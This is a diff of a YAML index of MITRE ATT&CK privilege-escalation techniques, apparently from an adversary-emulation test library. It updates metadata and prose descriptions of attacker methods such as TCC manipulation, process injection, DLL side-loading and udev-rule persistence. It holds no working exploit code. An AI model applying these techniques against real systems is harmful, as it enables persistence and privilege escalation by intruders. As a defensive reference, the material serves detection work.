+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22305,7 +22600,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22370,7 +22664,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22445,7 +22738,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22473,7 +22766,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22504,7 +22796,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22547,12 +22839,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22569,7 +22859,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22628,7 +22918,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22710,12 +22999,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22812,7 +23100,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22926,7 +23213,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22996,7 +23282,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -23024,7 +23309,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23068,8 +23353,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -23105,7 +23388,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23124,12 +23407,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23179,12 +23461,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23217,9 +23498,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23236,9 +23518,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23284,38 +23565,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23323,6 +23585,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23330,7 +23594,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23360,7 +23624,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23406,7 +23669,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23451,8 +23714,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23478,7 +23739,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23504,59 +23765,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23573,6 +23803,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23587,21 +23820,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23646,9 +23910,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23705,8 +23968,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23715,7 +23978,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23757,7 +24019,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23782,12 +24044,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23827,8 +24088,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23836,13 +24099,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23873,9 +24136,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Azure Persistence Automation Runbook Created or Modified
@@ -23959,10 +24219,10 @@ privilege-escalation:
           terraform destroy -auto-approve
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -24025,7 +24285,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -24059,8 +24319,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -24069,6 +24329,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24081,7 +24345,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -24184,9 +24447,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
